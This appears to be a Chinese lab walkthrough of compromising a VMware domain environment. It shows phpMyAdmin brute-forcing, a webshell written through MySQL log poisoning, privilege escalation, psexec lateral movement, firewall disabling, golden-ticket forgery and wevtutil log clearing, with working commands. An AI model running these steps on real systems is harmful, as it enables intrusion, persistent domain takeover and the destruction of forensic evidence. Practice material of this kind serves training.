考虑到是实战环境就在不知道win7和winserver的密码的条件下打了

机器

网卡

VMware 模式

IP

Kali

网卡1

NAT / VMnet8

自动获取,例:192.168.17.128

Win7

网卡1

NAT / VMnet8

自动获取或静态,例:192.168.17.130

Win7

网卡2

仅主机 / VMnet1 或 VMnet3

192.168.52.143

Server 2008 域控

网卡1

仅主机 / 同 Win7 内网网卡

192.168.52.138

以上是我的网卡和ip配置

首先探测一下当前网段有什么主机存活(存活ip探测)

netdiscover -i eth0 -r 192.168.52.0/24

可以看到130的ip存活

使用攻击机kali自带的 nmap 进行端口扫描

nmap -sS -A -n -T4 -p- 192.168.17.130

发现80端口存活

访问一下当前ip的80端口发现真的起了web服务

下面发现有登录框

直接双payload爆破一下:

成功发现用户名和密码是root 和 admin123

扫描一下后台发现的确存在phpmyadmin的登录窗口,用我们扫描出来的账号密码登录

御剑扫一下发现出现phpmyadmin,那么直接访问一下

登陆成功

看到页面存在sql,来执行命令

日志污染打外网写webshell

具体命令如下:

1.查看日志位置

show variables like '%general%';

可以看到位置不在www,读写权限也没打开

下面依次修改路径,打开权限:

修改路径:

set global general_log_file="C:\\phpStudy\\WWW\\shell.php"

(shell.php太明显最好改成别的名字防止被杀软秒杀)

打开权限:

set global general_log="On"

改完之后再查看一下发现文件路径和权限就都对了:

show variables like '%general%';

写入一句话木马:

SELECT '<?php eval($_POST["cmd"])?>'

写入之后蚁剑连接

成功进入web服务器

内网渗透

上线cs会话

利用插件lstar进行烂土豆提权(JuicyPotato)或者printspoofer或者(ms14-058提取)都可以

下一步横向移动

先抓取明文密码

看到已经抓取到了

探测存活ip,发现域控的存活

查看域控制器的信息

刚刚我们端口扫描的时候发现开放了445端口,可以创建SMB监听隧道。

  1. SMB监听隧道的核心原理是利用SMB协议在目标主机上建立隐蔽的通信通道,绕过传统防火墙和入侵检测系统的监控。

  2. SMB协议基础:文件共享,域名解析等,默认通过445端口通信

1.创建SMB监听器

image-20250510202945599

2.切换攻击目标列表

image-20250510203000591

3. 右建选择—> 横向移动 —> psexec

image-20250510203013523

4.添加 用户名 密码 域名 -> 监听器 -> 对端连接的隧道

监听器选择我们刚刚创建的SMB监听器,对端连接的隧道选择system权限的

image-20250510203031344

横向成功,进入域控,记得养成好习惯关防火墙。

image-20250510203050825
shell netsh advfirewall set allprofiles state off
image-20250510203105064

权限维持(黄金票据)

黄金票据是指能够绕过认证授权机制并获得所需权限的票据。这种票据可以被攻击者收集和利用,从而从系统内部获取高权限,甚至完全控制系统。

抓取 Hash 还有明文密码

把SID,域名,复制下来等下黄金票据要用

hash: 58e91a5ac358d86513ab224312314061:::

image-20250510203145554

SID: S-1-5-21-2952760202-1353902439-2381784089-1000

image-20250510203159562

域名:GOD.ORG

黄金票据配置

凭证提权—>黄金票据

image-20250510203219801

把刚刚复制的域名,SID粘贴上去,hash已经帮你自动抓取了,用户名随便

image-20250510203232588

ok成功

image-20250510203241758

痕迹清除

在渗透过程中,痕迹清除非常非常重要,不清除万一被溯源,容易被ban

shell wevtutil cl security               //清理安全日志
shell wevtutil cl system                 //清理系统日志
shell wevtutil cl application            //清理应用程序日志
shell wevtutil cl "windows powershell"   //清除power shell日志
shell wevtutil cl Setup                  //清除(cl)事件日志中的 "Setup" 事件。